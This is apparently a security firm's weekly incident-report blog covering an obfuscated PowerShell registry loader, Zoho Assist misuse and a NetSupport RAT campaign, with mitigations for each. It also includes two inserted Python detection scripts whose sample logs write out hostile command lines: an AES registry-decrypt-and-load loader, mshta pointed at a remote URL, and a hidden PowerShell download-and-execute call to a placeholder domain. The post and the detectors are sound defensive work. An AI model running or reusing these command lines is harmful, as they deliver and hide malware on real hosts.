Between October 16-23, 2024, Blackpoint’s Security Operations Center (SOC) responded to 602 total incidents across on-premises, Microsoft 365, and Google Workspace protected environments. The three incidents we will cover this week involved many tools, but of particular interest are confirmed or likely threat actor use of:
- Obfuscated PowerShell for execution.
- Zoho Assist likely for persistence.
- NetSupport remote access trojan (RAT) campaign likely for persistence.
In this blog, we’ll dive into the details of three select incidents, why they matter for our partners, and possible mitigations using your existing tech stack alongside Blackpoint Cyber’s managed services.
Incident #1: Obfuscated PowerShell
Topline Takeaways
- Industry target: Government
- Attacker methods:
  - Obfuscated PowerShell
  - Linux C2 hosted in Finland
  - Potential SolarMarker
- Recommended mitigations:
  - Require the use of secure password managers.
  - Employ least-privilege access controls.
  - Implement strict controls on the use of scripting languages.
Incident Timeline for 2024-10-16
Blackpoint’s MDR technology alerted to obfuscated PowerShell on a device of a government partner. Blackpoint’s Active SOC isolated the impacted device and contacted the partner to inform them of the incident.
Initial investigation into the incident revealed that the obfuscated PowerShell first initialized a new Advanced Encryption Standard (AES) Encryption Service Provider object and then set the AES encryption key. Once both the AES object and key were created, it set the initialization vector (IV). With these prerequisites in place, encrypted default registry values located under HKCU:\Software\Classes\ were retrieved. Using the previously set AES key and IV, the PowerShell decrypted those values and then loaded and executed the resulting data in memory.
Further investigation revealed a malicious PowerShell callout to a Linux command and control (C2) hosted in Finland. While Blackpoint’s SOC was unable to validate the malware due to quick response and isolation, the activity aligns with a possible SolarMarker infection.
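As an added defender-side example (not code from the original post or from Blackpoint), the following Python checks PowerShell script block log text for the four-stage pattern described above: AES provider creation, key/IV assignment, a read from HKCU:\Software\Classes, and an in-memory load. Both script samples are constructed for illustration, and the registry key name is a placeholder.

```python
import re

# Constructed sample of a PowerShell ScriptBlock log (Event ID 4104) body,
# modelled on the loader behaviour described above; not a real sample.
SUSPICIOUS_BLOCK = r"""
$a = New-Object System.Security.Cryptography.AesCryptoServiceProvider
$a.Key = [Convert]::FromBase64String('<constructed-key-b64>')
$a.IV  = [Convert]::FromBase64String('<constructed-iv-b64>')
$d = (Get-ItemProperty -Path 'HKCU:\Software\Classes\xyz123').'(default)'
$p = $a.CreateDecryptor().TransformFinalBlock($d, 0, $d.Length)
[System.Reflection.Assembly]::Load($p).EntryPoint.Invoke($null, $null)
"""

# Constructed benign script: also uses AES, but only to encrypt a file on disk.
BENIGN_BLOCK = r"""
$a = New-Object System.Security.Cryptography.AesCryptoServiceProvider
$a.GenerateKey(); $a.GenerateIV()
$b = [IO.File]::ReadAllBytes('C:\temp\report.docx')
[IO.File]::WriteAllBytes('C:\temp\report.enc', $a.CreateEncryptor().TransformFinalBlock($b, 0, $b.Length))
"""

# Each indicator alone is common in legitimate scripts; the combination of all
# four stages inside one script block is what characterises the loader.
INDICATORS = [
    ("aes_provider", re.compile(r"AesCryptoServiceProvider|Cryptography\.Aes\]", re.I)),
    ("key_iv_set", re.compile(r"\.(Key|IV)\s*=", re.I)),
    ("hkcu_classes_read", re.compile(r"Get-ItemProperty[^\n]*HKCU:\\Software\\Classes", re.I)),
    ("in_memory_load", re.compile(r"Assembly\]::Load\(|Invoke-Expression|\bIEX\b", re.I)),
]

def score_script_block(text: str):
    """Return the names of the indicators found in a script block, in stage order."""
    return [name for name, rx in INDICATORS if rx.search(text)]

def is_registry_loader(text: str) -> bool:
    """Alert only when key material, a registry read and an in-memory load co-occur."""
    return len(score_script_block(text)) == len(INDICATORS)

if __name__ == "__main__":
    for label, block in (("suspicious", SUSPICIOUS_BLOCK), ("benign", BENIGN_BLOCK)):
        print(f"{label}: {score_script_block(block)} alert={is_registry_loader(block)}")
```

The benign sample trips only the AES indicator, which is why the alert requires all four stages rather than any one of them.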
More About SolarMarker
SolarMarker is written in .NET, possesses backdoor and information-stealing capabilities, and has been active since 2021. SolarMarker has previously been reported to encrypt its traffic to C2 servers using hard-coded RSA keys and symmetric AES in CBC mode; data is often exfiltrated in JSON format to the attacker’s C2 server.
The threat actor behind the SolarMarker malware has consistently made changes and improvements to avoid takedown and detection methods, making SolarMarker an attractive and competitive malware operation.
APG Threat Analysis for SolarMarker
Blackpoint’s Adversary Pursuit Group (APG) predicts the continued deployment of the SolarMarker malware to target organizations across all verticals over the next 12 months. This assessment is supported by the observation of similar incidents involving our partner in healthcare on April 05, 2024 and external reports related to the deployment of SolarMarker.
Mitigations
- Require the use of secure password managers to make accessing passwords by threat actors more difficult.
- Employ least-privilege access controls to ensure that users only have access to the data and resources required to complete their job functions.
- Implement strict controls on the use of scripting languages, as threat actors rely on scripting languages to deploy malware and conduct malicious activities.
Incident #2: Zoho Assist
Topline Takeaways
- Industry target: Industrials
- Attacker methods:
  - Zoho Assist
  - Google Chrome
- Recommended mitigations:
  - Provide a dedicated software center.
  - Implement application controls.
  - Regularly audit both environment and endpoints.
Incident Timeline for 2024-10-17
On October 17, 2024, Blackpoint’s MDR technology alerted to the execution of Zoho Assist on the host of an Industrials partner. Blackpoint’s Active SOC isolated the impacted device and contacted the partner to provide information on the incident.
Initial investigation into the incident found that Zoho Assist was downloaded via Google Chrome. Blackpoint’s SOC identified network callouts from agent.exe and ZAAudioClient.exe. Blackpoint’s SOC’s quick response and isolation of affected devices prevented any additional malicious activity.
More About Zoho Assist
Zoho Assist is a remote support and access software that provides users with remote access to control devices. Zoho Assist can be deployed on Windows, Mac, Linux, Chromebook, Android, and iOS devices making the tool an attractive tool for organizations.
Blackpoint’s APG has tracked at least 5 advanced persistent threat (APT) groups and 6 ransomware operations that have been reported to utilize Zoho Assist. Threat actors have often been observed deploying Zoho Assist to maintain persistent access on target networks. Zoho Assist has also been used by scammers purporting to offer remote support and attempting to get a targeted victim to install the tool under the guise that a legitimate support employee needs to access a device to correct the “problem”. The wide array of platforms available to target and the potential for blending into “normal” traffic likely increase the attractiveness of this tool.
APG Threat Analysis for Zoho Assist
Threat actors will likely continue to utilize legitimate tools, such as Zoho Assist, for persistent access to victim organizations over the next 12 months. Incidents involving financials and industrials partners in March 2024 support this assessment.
Mitigations
- Dedicated Software Center: Ensure employees only download software from monitored, approved sources.
- Implement Managed Application Control (MAC) for continuous monitoring and blocking of unapproved software.
- Regularly audit both environment and endpoints to identify potential rogue applications and potential old/unused accounts that should be removed.
Incident #3: NetSupport RAT
Topline Takeaways
- Industry target: Institutions & Organizations
- Attacker methods:
  - Social engineering for initial access
  - NetSupport RAT
  - .html initial file
- Recommended mitigations:
  - Create and implement employee security training.
  - Require the use of multi-factor authentication (MFA).
  - Use strong, unique passwords.
Incident Timeline for 2024-10-22
Blackpoint’s MDR technology alerted to execution of mshta.exe on the host of an institutions & organizations partner. Analysis into the incident identified files associated with the NetSupport RAT. Blackpoint’s SOC responded to this incident based on the execution of mshta.exe and was able to isolate the affected host, preventing lateral movement or any additional malicious activity.
Initial investigation identified that the remote execution of mshta.exe was tied to an .html file hosted at “hxxps://holidaybunch[.]com/”, which has been linked to a NetSupport RAT campaign. The domain prompts the user with a Cloudflare captcha, and then JavaScript within the .html file automatically copies an mshta command into the clipboard that downloads and executes NetSupport RAT.
Additional analysis identified that obfuscated PowerShell downloaded a .png file from another domain, “hxxp[://]traversecityspringbreak[.]com”. This file was executed in memory via Invoke-Expression (IEX). After execution, the DNS cache of the host was flushed, and a newly created directory, “HVporg”, located at C:\Users\$username\AppData\Roaming\HVpOrg, was hidden via “attrib”.
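As an added defender-side example (not code from the original post or from Blackpoint), the following Python correlates process-creation events into the chain described above: mshta.exe launched with a remote URL, a child PowerShell using IEX on a downloaded non-script file, a DNS cache flush, and attrib hiding a directory under AppData\Roaming. The events, hostnames, PIDs and domains are constructed placeholders, and a second host shows legitimate mshta and ipconfig use that must not alert.

```python
import re
from collections import defaultdict

# Constructed process-creation events (Sysmon Event ID 1 style), modelled on the
# chain described above; hosts, PIDs, user name and domains are invented.
EVENTS = [
    {"host": "WS01", "pid": 101, "ppid": 1,   "image": "explorer.exe",   "cmd": "explorer.exe"},
    {"host": "WS01", "pid": 102, "ppid": 101, "image": "mshta.exe",      "cmd": "mshta https://<campaign-domain>/x.hta"},
    {"host": "WS01", "pid": 103, "ppid": 102, "image": "powershell.exe",
     "cmd": "powershell -w hidden -ep bypass IEX (New-Object Net.WebClient).DownloadString('http://<second-domain>/img.png')"},
    {"host": "WS01", "pid": 104, "ppid": 103, "image": "ipconfig.exe",   "cmd": "ipconfig /flushdns"},
    {"host": "WS01", "pid": 105, "ppid": 103, "image": "attrib.exe",     "cmd": "attrib +h C:\\Users\\jdoe\\AppData\\Roaming\\HVpOrg"},
    # Benign admin activity on another host: local .hta, routine DNS flush.
    {"host": "WS02", "pid": 200, "ppid": 1,   "image": "mshta.exe",      "cmd": "mshta C:\\Tools\\inventory.hta"},
    {"host": "WS02", "pid": 201, "ppid": 1,   "image": "ipconfig.exe",   "cmd": "ipconfig /flushdns"},
]

# Stage name -> (image regex, command-line regex). Matched case-insensitively.
STAGES = {
    "mshta_remote":   (r"mshta\.exe", r"https?://"),
    "iex_non_script": (r"powershell\.exe", r"(IEX|Invoke-Expression)[^\n]*\.(png|jpg|gif|txt)\b"),
    "dns_flush":      (r"ipconfig\.exe", r"/flushdns"),
    "hidden_roaming": (r"attrib\.exe", r"\+h[^\n]*AppData\\Roaming"),
}

def stage_of(ev):
    """Return the stage name an event matches, or None."""
    for name, (img_rx, cmd_rx) in STAGES.items():
        if re.search(img_rx, ev["image"], re.I) and re.search(cmd_rx, ev["cmd"], re.I):
            return name
    return None

def correlate(events):
    """Group stage hits per host and require the PowerShell to be a child of mshta."""
    pid_map = {(e["host"], e["pid"]): e for e in events}
    by_host = defaultdict(dict)
    for ev in events:
        st = stage_of(ev)
        if st:
            by_host[ev["host"]][st] = ev
    results = {}
    for host, stages in by_host.items():
        chained = False
        if "mshta_remote" in stages and "iex_non_script" in stages:
            parent = pid_map.get((host, stages["iex_non_script"]["ppid"]))
            chained = parent is stages["mshta_remote"]
        # Alert on the parent/child link plus at least one follow-on stage.
        results[host] = {"stages": sorted(stages), "mshta_to_powershell": chained,
                         "alert": chained and len(stages) >= 3}
    return results

if __name__ == "__main__":
    for host, verdict in correlate(EVENTS).items():
        print(host, verdict)
```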
More About NetSupport RAT
NetSupport RAT is a legitimate remote support tool that is frequently abused by threat actors for illicit purposes. NetSupport RAT can transfer files, provide persistent remote access, perform keylogging, and control system resources.
Due to the widespread use and availability for both malicious and legitimate use cases, the use of NetSupport RAT cannot be attributed to a single threat actor/group. This widespread use of NetSupport RAT leads to a variety of initial access methods; however, social engineering appears to remain a top choice for deploying NetSupport RAT.
APG Threat Analysis for NetSupport RAT
Blackpoint’s APG predicts that threat actors will likely continue to use NetSupport RAT for persistence over the next 12 months. This is supported by previous incidents involving an industrials partner in May 2024 and healthcare and consumer non-cyclicals partners in June 2024.
Mitigations
- Create and implement employee security training that includes how to spot signs of a phishing email and when and how to report suspicious emails to an incident response authority.
- Require the use of MFA to make the use of compromised credentials harder by providing an additional layer of authentication.
- Strong Password Policies: Implement unique, strong passwords and rotate them regularly.
Conclusion
These incidents underscore the evolving tactics of threat actors and highlight the importance of layered defenses. By leveraging Blackpoint’s MDR technology and following these mitigation strategies, you can bolster your organization’s defenses against these types of attacks. Reach out to Blackpoint’s SOC team for tailored recommendations on how to enhance your cybersecurity posture.